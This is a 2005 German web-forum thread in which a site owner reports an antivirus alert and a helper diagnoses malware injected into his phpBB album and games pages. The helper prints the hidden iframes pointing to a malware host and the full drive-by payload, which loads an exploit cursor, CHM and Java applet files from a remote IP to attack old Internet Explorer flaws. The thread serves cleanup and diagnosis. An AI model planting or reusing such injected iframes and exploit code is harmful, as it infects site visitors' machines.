[HELP] Virus oder Wurm in Album??

Helmut71 · Beitrag von **Helmut71** » 14.04.2005 08:35

Hallo..ich hab ein echt GROSSES Problem!!

In meinem Album/Board (??) hat sich irgendein Wurm oder Virus eingeschlichen!

Genauer kann ichs auch nicht definieren, da ich damit wenig Erfahrung habe - jedenfalls schlägt mein Norton beim Aufruf des Albums sofort Alarm: http://www.hohenau.net/forum/album.php

Wer kann bitte helfen, es ist dringen!!

(Bitte nur mit Antivirenprogramm aufrufen)

larsneo · Beitrag von **larsneo** » 14.04.2005 08:56

in der tat - du hast ein problem...
beim aufruf der seite versucht mein ff eine 'newxpl.php' nachzuladen:

Code: Alles auswählen

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMC[....]

ich denke einmal, dass das auf die 'klassischen' ie-sicherheitslücken abzielt.

der übeltäter dafür sitzt in der kategoriebeschreibung zu 'Events in Hohenau'

Code: Alles auswählen

<iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>

darin liegt dann der eigentliche payload

Code: Alles auswählen

 1: <html><head>
 2: </head><body>
 3: <style>
 4: * {CURSOR: url("http://213.159.117.203/dl/adv514/sploit.anr")}
 5: </style>
 6: <script>
 7: try{
 8: document.write('<object data="&#'+109+';s-its:mhtml'+':'+'file://C:\\nosuch.mht!http://213.159.117.203/dl/adv514/x.chm::/x.htm" type="text/x-scriptlet"></object>');
 9: document.write('<applet'+' width=1 height=1 '+'ARCHIVE=loader'+'adv514.jar co'+'de=Counter></AP'+'PLET>');
10: }catch(e){}
11: </script>
12: <IFRAME SRC="http://213.159.117.203/dl/newexpl.php?adv=adv514" WIDTH=1 BORDER=0 HEIGHT=1></IFRAME>
13: </body></html>

insgesamt ein wirklich interessantes exploit - passender lesestoff findet sich unter http://www.mnin.org/forums/viewtopic.php?t=112 - die passende sicherheitslücke dazu ist http://www.microsoft.com/technet/securi ... 5-002.mspx

Helmut71 · Beitrag von **Helmut71** » 14.04.2005 09:20

danke erstmal...

Ich bin jetzt leider nicht an meinem PC - in welcher Datei steckt das genau drinnen bzw. wie kann man es entfernen???

Müsste es meinem Provider weiterleiten.

larsneo · Beitrag von **larsneo** » 14.04.2005 09:21

Helmut71 hat geschrieben:in welcher Datei steckt das genau drinnen bzw. wie kann man es entfernen???

larsneo hat geschrieben:der übeltäter dafür sitzt in der kategoriebeschreibung zu 'Events in Hohenau'

kontrolliere erst einmal die entsprechende beschreibung via ACP

Helmut71 · Beitrag von **Helmut71** » 14.04.2005 09:27

ok habs kapiert..da war tatsächlich dieser iframe-Befehl eingetragen. Habs gelöscht.

Wie in gottesnamen kann das passsieren??

Gibts da ein Sicherheitsloch??

Helmut71 · Beitrag von **Helmut71** » 14.04.2005 09:28

gleich noch ne Bitte: kann jemnd die Games probieren?? Angeblich kam es da auch mal zu einer Virus-Attacke: http://www.hohenau.net/forum/activity.php

larsneo · Beitrag von **larsneo** » 14.04.2005 09:29

Wie in gottesnamen kann das passsieren??

das würde mich auch interessieren - kannst du die logfiles auswerten?

larsneo · Beitrag von **larsneo** » 14.04.2005 09:30

kann jemnd die Games probieren??

Code: Alles auswählen

<a href="profile.php?mode=register" class="mainmenu"><img src="templates/subSilver/images/icon_mini_register.gif" width="12" height="13" border="0" alt="Registrieren" hspace="3" />Registrieren - More games available to Registered Members - No Fee - No Catch.<br /><iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe></a><br />

Helmut71 · Beitrag von **Helmut71** » 14.04.2005 09:34

und wo ists da eingetragen???????

larsneo · Beitrag von **larsneo** » 14.04.2005 09:36

keine ahnung - den mod habe ich mir noch nie näher angeschaut...
vielleicht im entsprechenden template oder in der übersetzung.